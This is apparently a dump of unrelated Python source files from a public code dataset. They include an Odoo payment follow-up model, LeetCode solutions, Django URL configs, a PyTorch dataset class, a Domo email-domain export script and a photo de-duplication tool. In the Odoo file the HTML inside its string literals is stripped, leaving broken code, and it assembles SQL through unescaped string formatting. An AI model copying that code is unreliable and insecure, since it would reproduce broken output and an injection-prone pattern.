(partner.name, partner.email)\n for partner in partners_to_email])))\n else:\n unknown_mails = unknown_mails + 1\n action_text = _(\"Email not sent because of email address of \"\n \"partner not filled in\")\n if partner.upcoming_activity_date:\n payment_action_date = min(\n fields.Date.today(),\n partner.upcoming_activity_date)\n else:\n payment_action_date = fields.Date.today()\n if partner.upcoming_activity:\n upcoming_activity = \\\n partner.upcoming_activity + \\\n \" \\n \" + action_text\n else:\n upcoming_activity = action_text\n partner.with_context(context).write({\n 'upcoming_activity_date': payment_action_date,\n 'upcoming_activity': upcoming_activity})\n return unknown_mails\n\n @api.multi\n def get_followup_details(self):\n self.ensure_one()\n payment_followup_print = \\\n self.env['report.payment_followup.report_payment_followup']\n assert len(self.ids) == 1\n partner = self.commercial_partner_id\n followup_table = ''\n if partner.move_line_ids:\n company = self.env.user.company_id\n current_date = fields.Date.today()\n final_res = payment_followup_print._get_related_move_lines(\n partner, company.id)\n\n for currency_dict in final_res:\n currency = currency_dict.get(\n 'line', [{\n 'currency_id': company.currency_id\n }])[0]['currency_id']\n followup_table += '''\n \n \n \n \n \n \n \n \n \n '''\n total = 0\n for aml in currency_dict['line']:\n block = aml['blocked'] and 'X' or ' '\n total += aml['amount_balance']\n strbegin = \"\"\n date = aml['date_maturity'] or aml['date']\n if date <= current_date and aml['amount_balance'] > 0:\n strbegin = \"\"\n followup_table += \\\n \"\" + strbegin + str(aml['date']) + \\\n strend + strbegin + aml['name'] + \\\n strend + strbegin + \\\n (aml['ref'] or '') + \\\n strend + strbegin + \\\n str(date) + strend + strbegin + str(aml['amount_balance']) + \\\n strend + strbegin + block + strend + \\\n \"\"\n\n total = reduce(lambda x, y: x + y['amount_balance'],\n currency_dict['line'], 0.00)\n\n total = formatLang(self.env, total, dp='Account',\n currency_obj=currency)\n followup_table += '''\n
''' + _(\"Invoice Date\") + '''''' + _(\"Description\") + '''''' + _(\"Reference\") + '''''' + _(\"Due Date\") + '''''' + _(\"Amount\") + \" (%s)\" % (\n currency.symbol) + '''''' + _(\"Lit.\") + '''
\"\n strend = \"\"\n strend = \"
\n
\n
\n ''' + \\\n _(\"Amount due\") + ''' : %s\n
''' % (total)\n return followup_table\n\n @api.multi\n def set_action_done(self):\n return self.write({\n 'upcoming_activity_date': False,\n 'upcoming_activity': '',\n 'payment_responsible_id': False})\n\n @api.multi\n def _search_payment_earliest_date(self, operator, operand):\n args = [('expected_payment_date', operator, operand)]\n company_id = self.env.user.company_id.id\n having_where_clause = ' AND '.join(\n map(lambda x: \"(MIN(l.date_maturity) %s '%%s')\" % (x[1]), args))\n having_values = [x[2] for x in args]\n having_where_clause = having_where_clause % (having_values[0])\n query = 'SELECT partner_id FROM account_move_line l ' \\\n 'WHERE account_id IN ' \\\n '(SELECT id FROM account_account ' \\\n 'WHERE user_type_id IN ' \\\n '(SELECT id FROM account_account_type ' \\\n 'WHERE type=\\'receivable\\')) AND l.company_id = %s ' \\\n 'AND l.full_reconcile_id IS NULL ' \\\n 'AND partner_id IS NOT NULL GROUP BY partner_id '\n query = query % (company_id)\n if having_where_clause:\n query += ' HAVING %s ' % (having_where_clause)\n self._cr.execute(query)\n res = self._cr.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n @api.multi\n def _get_query(self, args, overdue_only=False):\n company_id = self.env.user.company_id.id\n having_where_clause = ' AND '.join(\n map(lambda x: '(SUM(bal2) %s %%s)' % (x[1]), args))\n having_values = [x[2] for x in args]\n having_where_clause = having_where_clause % (having_values[0])\n overdue_only_str = overdue_only and 'AND date_maturity <= NOW()' or ''\n return ('''SELECT pid AS partner_id, SUM(bal2) FROM\n (SELECT CASE WHEN bal IS NOT NULL THEN bal\n ELSE 0.0 END AS bal2, p.id as pid FROM\n (SELECT (debit-credit) AS bal, partner_id\n FROM account_move_line l\n WHERE account_id IN\n (SELECT id FROM account_account\n WHERE user_type_id IN (SELECT id\n FROM account_account_type\n WHERE type=\\'receivable\\'\n ))\n %s AND full_reconcile_id IS NULL\n AND company_id = %s) AS l\n RIGHT JOIN res_partner p\n ON p.id = partner_id ) AS pl\n GROUP BY pid HAVING %s''') % (\n overdue_only_str, company_id, having_where_clause)\n\n @api.multi\n def _search_amount_due(self, operator, operand):\n args = [('amt_tobe_paid', operator, operand)]\n query = self._get_query(\n args, overdue_only=False)\n self._cr.execute(query)\n res = self._cr.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n @api.multi\n def _search_amount_overdue(self, operator, operand):\n args = [('overdue_amt', operator, operand)]\n query = self._get_query(\n args, overdue_only=True)\n self._cr.execute(query)\n res = self._cr.fetchall()\n if not res:\n return [('id', '=', '0')]\n return [('id', 'in', [x[0] for x in res])]\n\n move_line_ids = fields.One2many(\n 'account.move.line', 'partner_id', string='Move Lines',\n domain=[('full_reconcile_id', '=', False),\n ('account_id.user_type_id.type', '=', 'receivable')])\n comment = fields.Text('Comments',\n track_visibility=\"onchange\", copy=False)\n user_id = fields.Many2one(\n 'res.users', ondelete='set null', string='User',\n track_visibility=\"onchange\", copy=False)\n upcoming_activity = fields.Text(\n 'Schedule Action', copy=False, track_visibility=\"onchange\")\n upcoming_activity_date = fields.Date(\n 'Upcoming Activity Date', copy=False)\n followup_line_id = fields.Many2one(\n 'payment.followup.line',\n compute='_compute_latest_fup_details',\n string=\"Follow-up Line\")\n followup_date = fields.Date(\n compute='_compute_latest_fup_details',\n string=\"Latest Payment Follow-up Date\")\n wo_legal_process_followup_line_id = fields.Many2one(\n 'payment.followup.line',\n compute='_compute_latest_fup_details',\n string=\"Follow-up Line w/o Legal Process\")\n expected_payment_date = fields.Date(\n compute='_compute_payment_rel_details', string=\"Payment Expected Date\",\n search='_search_payment_earliest_date')\n amt_tobe_paid = fields.Float(\n compute='_compute_payment_rel_details', string=\"Amount to be Paid\",\n store=False, search='_search_amount_due')\n overdue_amt = fields.Float(\n compute='_compute_payment_rel_details', string=\"Overdue Amount\",\n search='_search_amount_overdue')\n\n @api.multi\n def open_follow_ups(self):\n form_view = self.env.ref(\n 'payment_followup.view_res_partner_form')\n return {\n 'name': _('Follow Ups'),\n 'res_model': 'res.partner',\n 'res_id': self.id,\n 'views': [(form_view.id, 'form'), ],\n 'type': 'ir.actions.act_window',\n }\n","repo_name":"gagaboy/odoo10_plus","sub_path":"addons/payment_followup/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":17661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72958152833","text":"\"\"\"\n给定两个整数数组 preorder 和 inorder ,其中 preorder 是二叉树的先序遍历, inorder 是同一棵树的中序遍历,请构造二叉树并返回其根节点。\n\n来源:力扣(LeetCode)\n链接:https://leetcode.cn/problems/construct-binary-tree-from-preorder-and-inorder-traversal\n著作权归领扣网络所有。商业转载请联系官方授��,非商业转载请注明出处。\n\"\"\"\n# Definition for a binary tree node.\nfrom typing import List\nfrom typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n \"\"\"\n 递归\n 前序数组中的第一个元素即为二叉树的根节点,根据该元素切割中序数组,得到左序数组和右中序数组\n 中序数组和后续数据原始大小相等,可以根据切割后的中序数组切割后序数组,再得到前序数组中的第一个元素\n (再继续之前的步骤)\n :param preorder:\n :param inorder:\n :return:\n \"\"\"\n if not preorder:\n return\n\n pre = preorder[0]\n root_index = inorder.index(pre)\n root = TreeNode(pre)\n\n # 切割中序数组\n inorder_left = inorder[:root_index]\n inorder_right = inorder[root_index + 1 :]\n\n # 切割前序数组\n pre_left = preorder[1 : len(inorder_left) + 1]\n pre_right = preorder[len(inorder_left) + 1 :]\n\n root.left = self.buildTree(pre_left, inorder_left)\n root.right = self.buildTree(pre_right, inorder_right)\n\n return root\n\n\n# preorder = [3,9,20,15,7], inorder = [9,3,15,20,7]\n","repo_name":"SsuperL/leetcode-practice","sub_path":"medium/exercise_105.py","file_name":"exercise_105.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72583785475","text":"#!/usr/bin/env python\n# coding:utf8\n\"\"\"\n@Time : 2019/11/14\n@Author : fls\n@Contact : fls@darkripples.com\n@Desc : darkripples-对外api\n\n@Modify Time @Author @Version @Desciption\n------------ ------- -------- -----------\n2019/11/14 08:12 fls 1.0 create\n\"\"\"\n\nfrom django.urls import path\n\napp_name = 'app_dr_ifs'\n\nurlpatterns = [\n]\n","repo_name":"darkripples/django_mouldle_project","sub_path":"app_dr/ifs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70576693955","text":"from collections import deque \n\nclass Solution: \n @staticmethod\n def numIslands_bfs(grid): #bfs is iteratove\n if not grid:\n return 0\n \n islands = 0\n visited = set()\n rows, cols = len(grid), len(grid[0])\n\n def bfs(r, c):\n q = deque()\n visited.add((r, c))\n q.append((r, c))\n\n while q:\n row, col = q.popleft()\n directions = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\n for dr, dc in directions:\n r, c = row + dr, col + dc\n\n if ((r) in range(rows) \n and (c) in range(cols)\n and grid[r][c] == \"1\" \n and (r, c) not in visited):\n q.append((r, c))\n visited.add((r, c))\n\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == \"1\" and (r, c) not in visited:\n bfs(r, c)\n islands += 1\n\n return islands\n \n @staticmethod\n def numIslands_dfs(grid):\n if not grid or not grid[0]:\n return 0\n\n islands = 0\n visited = set()\n rows, cols = len(grid), len(grid[0])\n\n def dfs(r, c):\n if (\n r not in range(rows)\n or c not in range(cols)\n or grid[r][c] == \"0\"\n or (r, c) in visited\n ):\n return\n\n visited.add((r, c))\n directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n for dr, dc in directions:\n dfs(r + dr, c + dc)\n\n for r in range(rows):\n for c in range(cols):\n if grid[r][c] == \"1\" and (r, c) not in visited:\n islands += 1\n dfs(r, c)\n return islands\n\nclass Test:\n grid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n ]\n @classmethod\n def test_solution(cls):\n assert Solution.numIslands_bfs(cls.grid) == 1\n assert Solution.numIslands_dfs(cls.grid) == 1\n print(\"Both Test success\")\n\nTest.test_solution()\n \n \n","repo_name":"akashsonowal/ml-foundations","sub_path":"ml_foundations/ops_utils/coding_toolkit/data_structures_and_algorithms/graphs/number_of_islands.py","file_name":"number_of_islands.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44234076387","text":"def findRange(nums):\n pos_fim = 0\n for i in range(1, len(nums)):\n if nums[i] < nums[i-1]:\n pos_fim = i\n break\n\n ref = nums[pos_fim]\n pos_ini = 0\n for i in range(pos_fim):\n if nums[i] > ref:\n pos_ini = i-1\n break\n\n return nums[pos_ini], nums[pos_fim]\n\n\nif __name__ == '__main__':\n print(findRange([1, 7, 9, 5, 7, 8, 10]))\n # (1, 5)\n\n","repo_name":"silvioedu/TechSeries-Daily-Interview","sub_path":"day55/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9972261929","text":"\"\"\"\nHere, we create a custom dataset\n\"\"\"\nimport torch\n\nfrom utils.types import PathT\nfrom torch.utils.data import Dataset\nfrom typing import Any, Tuple\nfrom PIL import Image\nimport glob\nimport ast\nfrom torchvision import transforms\n\n\nclass MaskDataset(Dataset):\n \"\"\"\n Mask dataset. contains the images, the bounding box and the label\n \"\"\"\n\n def __init__(self, path: PathT) -> None:\n # Set variables\n self.folder_path = path\n\n # Load features\n self.image_list = self._get_features()\n\n def __getitem__(self, index: int) -> Tuple:\n \"\"\"\n :return: image, bounding box, label, shape\n \"\"\"\n return self.image_list[index][0], self.image_list[index][1], self.image_list[index][2], self.image_list[index][\n 3], self.image_list[index][4]\n\n def __len__(self) -> int:\n \"\"\"\n :return: the length of the dataset (number of sample).\n \"\"\"\n return len(self.image_list)\n\n def _get_features(self) -> Any:\n \"\"\"\n :return: list of lists with the features of the images,\n [[image1, bounding box1, label1, shape1],[image2, bounding box2, label2, shape2],...] as values\n \"\"\"\n\n image_list = []\n for filename in glob.glob(self.folder_path + '/*.jpg'):\n im = Image.open(filename)\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n normalize, ])\n\n # extracting bb, label and shape\n closer_location = filename.find(']') + 1\n opener_location = filename.find('[')\n bounding_box = torch.tensor(ast.literal_eval(filename[opener_location:closer_location]),\n requires_grad=False, dtype=torch.int32)\n shape = torch.tensor(im.size, requires_grad=False, dtype=torch.int32)\n label = torch.tensor(ast.literal_eval(filename[closer_location + 2:-4]), requires_grad=False,\n dtype=torch.float32)\n image = transform(im.copy())\n\n # scaling the shape of the bounding box to [0,1] scale\n relative_bb = self.scale_bb(bounding_box, shape)\n image_list.append([image, relative_bb, label, shape, filename])\n im.close()\n return image_list\n\n @staticmethod\n def scale_bb(bounding_box, shape):\n \"\"\"\n\n :param bounding_box: location of the bounding box\n :param shape: original shape of the image\n :return: scales version of the bounding box\n \"\"\"\n rel_x = bounding_box[0] / shape[0]\n rel_y = bounding_box[1] / shape[1]\n rel_width = bounding_box[2] / shape[0]\n rel_height = bounding_box[3] / shape[1]\n return torch.tensor([rel_x, rel_y, rel_width, rel_height], requires_grad=False, dtype=torch.float32)","repo_name":"ariel-berger/Mask_Identification","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13899301471","text":"'''\nExercício 2: Estenda a classe Stack , que escrevemos durante as explicações do\nconteúdo, para que ela suporte um limite de itens dentro da pilha. Se\ndefinirmos que a pilha deve ter o tamanho dois, ela não poderá ter três itens.\n'''\n\nfrom stack import Stack\n\n\nclass LimitStack(Stack):\n def __init__(self, limit):\n super().__init__()\n self.limit = limit\n\n def push(self, value):\n if self.size() < self.limit:\n self._data.append(value)\n else:\n raise 'StackOverflow'\n\n\ncontent_stack = LimitStack(2)\ncontent_stack.push(1)\ncontent_stack.push(-2)\ncontent_stack.push(3)\n","repo_name":"vanderson-henrique/trybe-exercises","sub_path":"COMPUTER-SCIENCE/BLOCO_39/39_3/conteudo/exercicio2.py","file_name":"exercicio2.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"28747275765","text":"from django.urls import path\nfrom blog import views\n\n# list urls\nurlpatterns = [\n path('', views.PostIndexView.as_view(), name='post-index'),\n path('', views.PostDetailView.as_view(), name='post-detail'),\n path('page/', views.PageDetailView.as_view(), name='page-detail'),\n path('category/', views.CategoryIndexView.as_view(), name='category-index'),\n path('/', views.PostMonthlyArchiveView.as_view(), name='monthly-post-archive')\n]\n","repo_name":"satujamsaja/django-blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73936574274","text":"\"\"\"\nThis is where the degendering takes place.\n\"\"\"\nimport regex\nimport sys\nimport random\nimport json\nfrom timeit import default_timer as timer\nfrom librarian import get_book_text, is_string\nfrom reference_library import NB_NAMES, NB_NAMES_MODERN, NB_NAMES_BY_DECADE, ALL_NAMES\nfrom reference_library import BOY_NAMES, GIRL_NAMES, ALL_PRONOUNS\nfrom reference_library import COMMON_WORDS, WARNING_WORDS, MALE_PRONOUN_DICT, FEMALE_PRONOUN_DICT\nfrom utilities import lazy_shuffle, sorted_by_values, get_min_diff, lazy_shuffle_keys, drop_low\n\nDEFAULT_PARAMETERS = {\n 'male' : 'nb',\n 'female' : 'nb',\n 'year' : 1960,\n 'name matches' : {},\n 'name choices' : 20\n }\n\n#Temporary values used to debug an optimization issue\nbook_timer = 0\nsoup_timer = 0\n\ndef get_pronoun_list():\n male_pronouns = [key for key in MALE_PRONOUN_DICT]\n female_pronouns = [key for key in FEMALE_PRONOUN_DICT]\n pronoun_list = male_pronouns + female_pronouns\n return pronoun_list\n\ndef get_suggestion(name_list, names_used):\n #print(f'Used names: {names_used}')\n available_names = [name for name in name_list if not name in names_used]\n #print(f'Available names: {available_names}')\n if available_names:\n selection = random.choice(available_names)\n #print(f'Selected name: {selection}')\n return selection\n else:\n selection = random.choice(name_list)\n #print(f'Selected name: {selection}')\n return selection\n \ndef suggest_name(gender, names_used):\n if gender == 'nb':\n return get_suggestion(NB_NAMES, names_used)\n elif gender == 'f':\n return get_suggestion(GIRL_NAMES, names_used)\n elif gender == 'm':\n return get_suggestion(BOY_NAMES, names_used)\n else:\n return ''\n \ndef fill_defaults(parameters):\n for key in DEFAULT_PARAMETERS:\n if key not in parameters:\n parameters[key] = DEFAULT_PARAMETERS[key]\n return parameters\n\ndef fix_text(text):\n \"\"\" Various substitutions to fix problems created by the fact\n we check pronouns one at a time \"\"\"\n text = regex.sub(r'àéà', '', text)\n text = regex.sub(r'His/Him/Hers', 'Her/Hers', text)\n text = regex.sub(r'Their/Them/Hers', 'Her/Hers', text)\n text = regex.sub(r'Their/Hers', 'Her/Hers', text)\n text = regex.sub(r'their/hers', 'her/hers', text)\n text = regex.sub(r'his/him/hers', 'her/hers', text)\n text = regex.sub(r'their/them/hers', 'her/hers', text)\n return text\n \ndef degender_text(text, parameters):\n start = timer()\n original_text = text\n match_dict = parameters['match dict']\n for key in match_dict:\n key_dict = match_dict[key]\n text = regex.sub(key_dict['pattern'], key_dict['replacement'], text)\n end = timer()\n global book_timer\n book_timer += (end-start)\n global soup_timer\n soup_timer += (end-start)\n return fix_text(text)\n\n\ndef degender_text_box(text, parameters):\n parameters = fill_defaults(parameters)\n pronoun_dict = create_pronoun_dict(parameters)\n name_dict = create_name_dict(parameters)\n match_dict = {**pronoun_dict, **name_dict}\n parameters['match dict'] = match_dict\n return degender_text(text, parameters)\n\ndef degender_all(item, parameters):\n if is_string(item):\n new_string = degender_text(item, parameters)\n if new_string:\n item.replace_with(new_string)\n else: \n try:\n for child in item.contents:\n degender_all(child, parameters)\n except AttributeError:\n pass\n\ndef create_pronoun_dict(parameters):\n pronoun_dict = {}\n if parameters['male'] == 'nb':\n male_index = 0\n elif parameters['male'] == 'f':\n male_index = 1\n else:\n male_index = -1\n if parameters['female'] == 'nb':\n female_index = 0\n elif parameters['female'] == 'm':\n female_index = 1\n else:\n female_index = -1\n for tup in [(MALE_PRONOUN_DICT,male_index),(FEMALE_PRONOUN_DICT,female_index)]:\n index = tup[1]\n reference_dict = tup[0]\n if index >= 0:\n for pronoun in reference_dict:\n match = reference_dict[pronoun][index]\n pronoun_dict[pronoun] = {'match':match,\n 'pattern':regex.compile(r'\\b' + pronoun + r'\\b'),\n 'replacement': match + 'àéà'}\n pronoun_dict[pronoun.title()] = {'match':match.title(),\n 'pattern':regex.compile(r'\\b' + pronoun.title()\n + r'\\b'),\n 'replacement': match.title() + 'àéà'}\n pronoun_dict[pronoun.upper()] = {'match':match.upper(),\n 'pattern':regex.compile(r'\\b' + pronoun.upper()\n + r'\\b'),\n 'replacement': match.upper() + 'àéà'}\n return pronoun_dict\n\ndef create_name_dict(parameters):\n name_matches = parameters['name matches']\n name_dict = {}\n for name in name_matches:\n match = name_matches[name]\n name_dict[name] = {'match':match,\n 'pattern':regex.compile(r'\\b' + name + r'\\b'),\n 'replacement': match + 'àéà'}\n name_dict[name.upper()] = {'match':match.upper(),\n 'pattern':regex.compile(r'\\b' + name.upper() + r'\\b'),\n 'replacement': match.upper() + 'àéà'}\n return name_dict\n \ndef degender_book(book_soup, parameters = DEFAULT_PARAMETERS):\n parameters = fill_defaults(parameters)\n pronoun_dict = create_pronoun_dict(parameters)\n name_dict = create_name_dict(parameters)\n match_dict = {**pronoun_dict, **name_dict}\n #print(f'match_dict: {match_dict}')\n parameters['match dict'] = match_dict\n with open('reference/test_match_dict.json', 'w') as json_file:\n json_dict = {}\n for key in match_dict:\n json_dict[key] = match_dict[key]['match']\n json.dump(json_dict, json_file)\n for soup in book_soup:\n global soup_timer\n degender_all(soup, parameters)\n print(f'Degendering times for soup: {soup_timer} seconds')\n soup_timer = 0\n print(f'Degendering times for book {book_timer} seconds:')\n\"\"\" \ndef get_text_dict(text):\n word_list = regex.sub(r'[^\\p{Latin}]',' ',text).split()\n name_list = [word for word in word_list if word in ALL_NAMES]\n name_dict = {}\n for name in name_list:\n if name in name_dict:\n name_dict[name] += 1\n else:\n name_dict[name] = 1\n return name_dict\n\ndef get_text_names(text):\n pattern = r'(?= 5}\n return short_name_dict\n name_tuple_list = []\n for key, value in sorted(short_name_dict.items(), key = lambda x: x[1], reverse=True):\n name_tuple_list.append((key,value))\n return name_tuple_list\n\ndef split_clean_warning_dict(count_dict):\n warning_dict = {}\n clean_dict = {}\n for key, count in count_dict.items():\n if key in WARNING_WORDS:\n warning_dict[key] = count\n else:\n clean_dict[key] = count\n return (clean_dict, warning_dict)\n\ndef combine_dicts(count_dicts):\n combined_dict = {}\n for count_dict in count_dicts:\n for key, count in count_dict.items():\n combined_dict[key] = combined_dict.get(key, 0) + count\n return combined_dict\n\ndef get_names(text):\n known_name_dict = get_known_names(text)\n potential_name_dict = get_potential_names(text)\n temp_tuple = split_clean_warning_dict(known_name_dict)\n known_name_dict = temp_tuple[0]\n warning_name_dict = temp_tuple[1]\n known_names = []\n for key, value in sorted(known_name_dict.items(), key = lambda x: x[1], reverse=True):\n known_names.append(key)\n potential_name_dict = combine_dicts([potential_name_dict, warning_name_dict])\n for key in [key for (key, value) in potential_name_dict.items()]:\n if key in known_names:\n del potential_name_dict[key]\n potential_names = []\n for key, value in sorted(potential_name_dict.items(), key = lambda x: x[1], reverse=True):\n potential_names.append(key)\n return (known_names, potential_names)\n\ndef get_book_names(book_soup):\n book_text = get_book_text(book_soup)\n name_tuple = get_names(book_text)\n return name_tuple\n","repo_name":"JimmyLamothe/Degenderer","sub_path":"degenderer.py","file_name":"degenderer.py","file_ext":"py","file_size_in_byte":11177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2925427705","text":"import pandas as pd\nimport numpy as np\nimport os\nimport pathlib\nimport subprocess\nimport json\nimport requests\nimport logging\nfrom common import helper\nfrom datetime import datetime\nimport re\nimport csv\n\n\n\n# ==== global vars\nregex = r'\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b'\nusername = \"\"\npassword = \"\"\ninstances_ref = \"inst_client_creds.csv\"\nexport_csv_ref = 'domain_list.csv'\nexport_data = pd.DataFrame()\nno_dataset = 30\nocc = \"=\" * 30\nlast_no_days = 3\ndataset_limit = 10000\ndataset_offset = 0\ninst_df_id = {}\nstd_list = ['Users [U][1] [Latest Metadata]']\n# ==== global vars\n\n# ===================== common ======================\ndef relative_path():\n return os.path.dirname(os.path.realpath(__import__(\"__main__\").__file__))\n\ndef check(email):\n if(re.fullmatch(regex, email)):\n return True\n else:\n return False\n\ndef fetch_all_emails(instance, session, client, dataset_id, ds_name, owner):\n dataset_offset=0\n loop_bool = True\n while loop_bool:\n\n dataset_payload = {\"querySource\":\"data_table\",\"useCache\":True,\n \"query\":{\n \"columns\":[{\"exprType\":\"COLUMN\",\"column\":\"Email\"}],\n \"limit\":{\"limit\": dataset_limit,\"offset\": dataset_offset},\n \"orderByColumns\":[],\"groupByColumns\":[],\n \"where\":{\"not\":False,\"exprType\":\"IN\",\n \"leftExpr\":{\"exprType\":\"COLUMN\",\"column\":\"User Account Status\"},\n \"selectSet\":[{\"exprType\":\"STRING_VALUE\",\"value\":\"active\"}]},\n \"having\":None},\n \"context\":{\"calendar\":\"StandardCalendar\",\n \"features\":{\"PerformTimeZoneConversion\":True,\"AllowNullValues\":True,\"TreatNumbersAsStrings\":True}},\"viewTemplate\":None}\n\n df_list = helper.export_dataset(instance, session, dataset_payload, dataset_id)\n\n data = [{\n 'domain': a[0][a[0].index('@') + 1 : ],\n 'ds_name': ds_name,\n 'client': client,\n 'instance_id': instance,\n 'owner_id': owner.get('id'),\n 'owner_name': owner.get('name')\n }\n for a in df_list['rows']\n if a[0] !='' and a[0]!=None ]\n print('===============================emails===================== ',)\n # Creates DataFrame.\n\n export_data = pd.DataFrame(data)\n print(\"instance={} , client={}, dataset_id={}, ds_name={}, owner={}\".format(instance, client, dataset_id, ds_name, owner))\n export_data.to_csv(export_csv_ref, mode='a', index=False, header=False)\n \n dataset_offset +=dataset_limit\n loop_bool = not(df_list['numRows'] < dataset_limit)\n \n def find_std(n, is_bool=False):\n ns = re.sub(r\"^\\d+\", \"\", n) # removed all the number from the begining\n ns = re.sub(r\"^\\_+\", \"\", ns) # removed _ from the begining\n ns = re.sub(r\"^Glue_\", \"\", ns) # removed Glue_ from the begining\n ns = re.sub(r\"^Glue\", \"\", ns) # removed Glue_ from the begining\n ns = ns.lstrip(' ')\n if(ns in std_list):\n return True if is_bool else ''\n else:\n print('search string ns = ',ns)\n return False if is_bool else ns\n\ndef fetch_all_ds(instance, session, client, current_user_id):\n offset=0\n\n payload = {\n \"entities\":[\"DATASET\"],\n \"filters\":[\n {\"filterType\": \"dateBucket\", \"field\": \"last_updated\", \"value\": \"LAST_DAY\"},\n # {\"filterType\":\"term\",\"field\":\"owned_by_id\",\"value\":\"{}\".format(current_user_id),\"not\":False},\n {\"field\":\"name_sort\",\"filterType\":\"wildcard\",\"query\":\"*{}*\".format(std_list[0])}\n ],\n \"combineResults\":True,\"query\":\"*\",\n \"count\": no_dataset, \"offset\": offset,\n \"sort\":{\"isRelevance\":False,\"fieldSorts\":[{\"field\":\"create_date\",\"sortOrder\":\"DESC\"}]}\n }\n\n ds = helper.fetch_datasets(instance, session, payload)\n print(\"found {} datasets in the instance {}\".format(ds['_metaData']['totalCount'], instance))\n # print('dataSources == ',ds['dataSources'])\n for dataset in ds['dataSources']:\n print('ds.name = ', dataset.get('name',''))\n print('dataset id = ', dataset['id'])\n fetch_all_emails(instance, session, client, dataset['id'], dataset.get('name',''), \n dataset.get('owner',{'id':'','name':''}))\n\n\n# ===================== common ======================\n\n\n# ======================================================================================================================\nprint(occ,\"Starting script now == \", datetime.now().strftime(\"%d-%b-%Y %H:%M:%S\"), occ)\n\n\ninstance_info = pd.read_csv(relative_path() + '/' + instances_ref)\n\ninstance_info[['username']] = instance_info[['username']].fillna(value=username)\ninstance_info[['password']] = instance_info[['password']].fillna(value=password)\n\ncols = [\n 'domain',\n 'ds_name',\n 'client',\n 'instance_id',\n 'owner_id',\n 'owner_name'\n ]\ndf = pd.DataFrame(columns=cols)\n\ndf.to_csv(export_csv_ref, index=False, quoting=csv.QUOTE_NONE)\n\nfor i, instance in instance_info.iterrows():\n # login to the instance and get the token from helper.get_session_token\n inst_id = instance['instance_id']\n auth = helper.get_session_token(inst_id,\n instance['username'],\n instance['password'], True)\n\n session = auth['sessionToken']\n\n # log error if login fails\n if type(session) != str and session[0] is None:\n logging.error(session[1])\n continue\n\n # get user counts\n client = instance['client']\n\n fetch_all_ds(inst_id, session, client, auth['userId'])","repo_name":"uninhibitedspirit/domo-automation","sub_path":"publish_reports/pick_domains.py","file_name":"pick_domains.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6620083455","text":"#!/usr/bin/env python3\nimport argparse\nfrom collections import defaultdict\nimport os\nimport sqlite3\nimport subprocess\nimport sys\n\nimport Config\nfrom ExifUtils import from_exif_timestamp\nimport Metadata as MetadataModule\nfrom Storage import (\n Bool,\n Int,\n Json,\n Table,\n Timestamp,\n Txt,\n )\n\nstore = MetadataModule.Store()\n\ndef delete_path(path):\n try:\n os.remove(path)\n except:\n print(\"Failed to deleted\", path)\n pass\n\ndef upload_path(fname):\n return os.path.join(Config.upload_dir, fname)\n\ndef thumbnail_path(fname):\n return os.path.join(Config.thumbnail_dir, fname)\n\ndef ask(msg, options):\n inp = None\n while inp not in options:\n inp = input(msg)\n\n return inp\n\ndef same_file(fname1, fname2):\n path1 = upload_path(fname1)\n path2 = upload_path(fname2)\n assert(os.path.exists(path1))\n assert(os.path.exists(path2))\n\n cmd = [\"diff\", path1, path2]\n try:\n subprocess.check_output(cmd)\n except:\n return False\n return True\n\ndef process_possible_duplicates(matches):\n print(\"\")\n print(\"-----------------------\")\n\n for match in matches:\n print(match.fname)\n\n print()\n\n if all(same_file(matches[0].fname, other.fname) for other in matches[1:]):\n choice = ask(\"Duplicates detected. (d)elete all but first (k)eep all (q)uit? \", {\"d\", \"k\", \"q\"})\n if choice == \"q\":\n print(\"Quitting\")\n sys.exit(0)\n if choice == \"k\":\n print(\"Skipping\")\n return\n\n for match in matches[1:]:\n try:\n delete_path(upload_path(match.fname))\n delete_path(thumbnail_path(match.fname))\n print(\"Deleted successfully\")\n except:\n print(\"Failed to delete uploaded file or thumbnail\")\n\n store._delete(upload_path(match.fname), match.fname, match)\n\n else:\n 